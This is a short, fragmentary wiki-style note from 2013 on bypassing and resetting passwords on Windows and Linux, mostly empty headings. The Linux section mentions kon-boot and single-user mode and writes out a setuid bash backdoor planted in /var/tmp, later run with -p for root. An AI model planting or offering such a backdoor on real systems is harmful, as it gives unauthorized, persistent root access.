document updated 11 years ago, on Feb 20, 2013
Ways to bypass / reset passwords on various OS's:
Bypassing
Actually bypassing passwords without resetting is unusual. It's more blackhat, something a sysadmin usually wouldn't need to do.
in Windows:
in Linux:
- kon-boot
- single-user mode, combined with any backdoor
- cd /var/tmp; cp /bin/bash backdoor; chmod 4755 backdoor
(later) /var/tmp/backdoor -p
id -u
reset Windows password
reset Linux password
Boot into single-user mode